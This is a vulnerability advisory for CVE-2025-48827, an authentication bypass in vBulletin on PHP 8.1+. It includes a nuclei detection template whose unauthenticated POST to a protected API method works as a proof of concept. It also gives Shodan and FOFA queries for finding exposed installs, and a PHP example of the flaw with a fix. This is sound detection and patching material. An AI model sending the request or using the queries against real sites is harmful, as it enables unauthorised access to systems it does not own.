vBulletin 500-603 - Authentication Bypass

Vulnerability Information

Vulnerability name: vBulletin 5.0.0-6.0.3 - Authentication Bypass

Vulnerability ID:

  • CVE: CVE-2025-48827

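Vulnerability type: Authorization bypass

Severity: Critical

Description: vBulletin is widely used forum software that supports features such as posting and user management, and is commonly found on corporate and personal websites. When running on PHP 8.1 or later, the software has an authentication bypass vulnerability that allows unauthenticated attackers to remotely invoke protected API controller methods. The root cause is an internal change in PHP 8.1 to ReflectionMethod::invoke() and similar methods, which by default allows protected or private methods to be invoked through PHP's Reflection API. This vulnerability lets an attacker execute arbitrary system commands as the web server user, resulting in full compromise of the system. The attack can be carried out remotely without authentication and can be automated, posing a serious threat to system security.

Vendor: vbulletin

Product: vbulletin

Affected versions: 5.0.0 <= version <= 5.7.5, 6.0.0 <= version <= 6.0.3

Search syntax: app="vBulletin"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/6f41aaeec41871233b23a1bfd1edafe97f0a1629/http%2Fcves%2F2025%2FCVE-2025-48827.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details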


id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely. Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'<div class=','{{rand_string}}','{{rand_value}}','/div>')
        condition: and
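
The root cause named in the description, the PHP 8.1 change to ReflectionMethod::invoke(), can be reproduced and fixed in isolation. The following is an added example, not vBulletin code and not part of the nuclei template: the class DemoAdApi and the functions dispatchWeak and dispatchStrict are hypothetical names. It shows a dispatcher that relies on Reflection to refuse non-public methods next to one that checks visibility explicitly.

```php
<?php
// Added illustration; all class and function names here are hypothetical.
declare(strict_types=1);

final class DemoAdApi
{
    public function listAds(): string { return 'public: ad list'; }

    // Internal helper that must never be reachable from a request.
    protected function renderInternal(string $tpl): string
    {
        return "protected: rendered {$tpl}";
    }
}

// Weak dispatcher: trusts invokeArgs() to reject non-public methods.
// PHP < 8.1 threw ReflectionException here; PHP >= 8.1 performs the call.
function dispatchWeak(object $controller, string $method, array $args): string
{
    $ref = new ReflectionMethod($controller, $method);
    return (string) $ref->invokeArgs($controller, $args);
}

// Hardened dispatcher: enforces visibility itself, so the result does not
// depend on which PHP version the application runs on.
function dispatchStrict(object $controller, string $method, array $args): string
{
    $ref = new ReflectionMethod($controller, $method);
    if (!$ref->isPublic()) {
        throw new RuntimeException("method {$method} is not public");
    }
    return (string) $ref->invokeArgs($controller, $args);
}

$controller = new DemoAdApi();
$calls = ['listAds' => [], 'renderInternal' => ['tpl-a']]; // constructed input

foreach ($calls as $method => $args) {
    foreach (['dispatchWeak', 'dispatchStrict'] as $dispatcher) {
        try {
            $out = $dispatcher($controller, $method, $args);
        } catch (Throwable $e) {
            $out = 'refused (' . get_class($e) . ')';
        }
        printf("PHP %s  %-14s %-15s -> %s\n", PHP_VERSION, $dispatcher, $method, $out);
    }
}
```

Running the script on PHP 8.0 and then on PHP 8.1 or later shows the weak dispatcher changing behaviour for the protected method, while the strict dispatcher refuses it on both.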



Author: lianccc
Published: July 5, 2025